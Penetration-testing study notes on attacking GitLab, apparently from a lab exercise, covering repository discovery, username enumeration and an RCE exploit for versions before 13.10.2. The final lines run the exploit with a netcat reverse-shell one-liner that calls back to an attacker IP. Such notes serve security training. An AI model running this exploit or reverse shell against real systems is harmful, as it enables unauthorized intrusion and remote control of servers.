GitLab
- gitlab - web based cicd
- go, ruby on rails, vue
- Comparison between GitHub, Gitlab, BitBucket - https://stackshare.io/stackups/bitbucket-vs-github-vs-gitlab
- During pentests, we might find a companys github, or self-hosted gitlab/bitbucket instances
- these might contain sensitive information in cleartext like passwords, tokens, ssh private keys
- GitLab allows for :
- public repositories (that require no authentication),
- internal repositories (available to authenticated users),
- private repositories (restricted to specific users)
- look for public repos; if allowed create an account and look for accessible repos.
- usually companies only allow a user with the org email address and an admin has to approve a request.
- we'll look into how we can update the gitlab settings to allow anyone to access it.
Discovery
- create a new account
- look for the projects/groups
- find the version and look for the possible cves
Enum
- CVEs - https://www.cvedetails.com/vulnerability-list/vendor_id-13074/Gitlab.html
- some versions have an issue:
- while creating a new user, if we add a username, the app checks if the username exists by send a request
- https://github.com/dpgg101/GitLabUserEnum
- https://www.exploit-db.com/exploits/49821
- or use burp intruder
- As with any type of password spraying attack, we should be mindful of account lockout and other kinds of interruptions.
- changing login configuration - https://gitlab.com/gitlab-org/gitlab-foss/-/blob/master/config/initializers/8_devise.rb
- Running the above will give us a list of valid usernames
Attacking
- for V < 13.10.2 - RCE - https://hackerone.com/reports/1154542
- exploit - https://www.exploit-db.com/exploits/49951
- sign up for a user on the gitlab instance
- start a
nc listener
python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u nickhalden -p admin123 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '